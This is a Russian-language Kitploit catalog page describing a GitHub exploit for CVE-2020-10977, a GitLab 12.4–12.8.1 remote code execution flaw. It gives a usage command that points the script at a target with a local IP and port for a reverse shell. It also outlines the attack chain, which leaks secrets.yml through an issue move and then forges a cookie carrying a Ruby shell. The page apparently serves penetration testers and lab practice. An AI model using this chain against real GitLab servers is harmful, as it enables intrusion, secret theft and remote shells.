Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-10977 — Gitlab v12.4.0-8.1 RCE | Kitploit
Инструменты/GitHubGitHub/liath/cve-2020-10977
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubliath/cve-2020-10977

CVE-2020-10977

Gitlab v12.4.0-8.1 RCE

Репозиторий
215 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

GitLab v12.4.0-12.8.1 RCE

Полностью основано на https://github.com/dotPY-hax/gitlab_RCE, который не сработал для меня, и разбор HTML казался громоздким, поэтому я переписал его на js.

Использование

Запустите обработчик обратной оболочки обычным способом, затем выполните этот скрипт:

root@kitploit:~
TARGET_URI="https://target" TARGET_EMAIL_DOMAIN="laboratory.htb" \
 TARGET_USER="test" TARGET_PASSWORD="Test pass 123" \
 LOCAL_IP="10.10.14.142" LOCAL_PORT="44044" \
 node gitlab_rce.js

Прокси может быть указан с помощью TUNNEL_HOST="127.0.0.1" TUNNEL_PORT="8080". Burp особенно полезен для отладки этого.

Что это делает

  1. проверяет, доступен ли целевой сервер
  2. если указанный пользователь существует, перейти к шагу 5
  3. сканирует на предмет имени пользователя, которое еще не существует
  4. создает этого пользователя
  5. пытается войти в систему
  6. создает два пустых проекта
  7. создает новую заявку (issue) с вредоносной ссылкой в ее теле в первом проекте
  8. перемещает новую заявку в другой проект, заставляя GitLab переписать нашу вредоносную ссылку и скопировать файл, на который она указывает, в директорию uploads
  9. извлекает целевой файл, в данном случае нам нужен secrets.yml для secret_key_base
  10. использует secret_key_base для создания вредоносного cookie с нашей Ruby-оболочкой и передает его GitLab
Скачать инструмент